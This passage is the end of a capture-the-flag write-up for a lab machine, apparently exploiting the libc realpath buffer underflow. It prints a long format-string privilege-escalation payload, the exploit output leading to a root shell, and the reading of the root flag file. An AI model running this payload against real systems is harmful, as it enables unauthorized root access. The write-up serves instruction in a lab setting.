Using escalation string %69$hn%73$hn%1$27168.27168s%70$hn%1$5349.5349s%68$hn%72$hn%1$4890.4890s%67$hn%1$1.1s%71$hn%1$3040.3040s%66$hn%1$25088.25088s%1$36214.36214s%1$s%1$s%65$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%39$hn-%35$lx-%39$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%70$lx-%71$lx-%78$s
Executable now root-owned
Cleanup completed, re-invoking binary
/proc/self/exe: invoked as SUID, invoking shell ...
whoami
root
Root Flag
# cat /root/root.txt
<ROOT_FLAG>
References
- NibbleBlog 4.0.3 Shell Upload
- LES: Linux privilege escalation auditing tool
- Libc Realpath Buffer Underflow
Daniel Simao 07:18, 26 November 2019 (EST)